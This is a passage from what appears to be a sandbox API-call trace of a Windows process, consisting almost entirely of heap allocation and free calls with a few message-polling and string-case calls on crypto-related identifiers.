HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2668 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28e8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0182.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0182.318] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2768 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0182.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4e0 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0182.319] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x181e2) returned 0xa771f8 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0182.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0182.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0182.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0182.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0182.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0182.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0182.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.321] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0182.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0182.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2808 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0182.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b50 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0182.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0182.321] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.322] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0182.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0182.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0182.328] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.328] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0182.328] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0182.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0182.329] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0182.329] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0182.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.330] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0182.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0182.331] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26e8 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0182.332] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0182.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0182.333] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.333] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 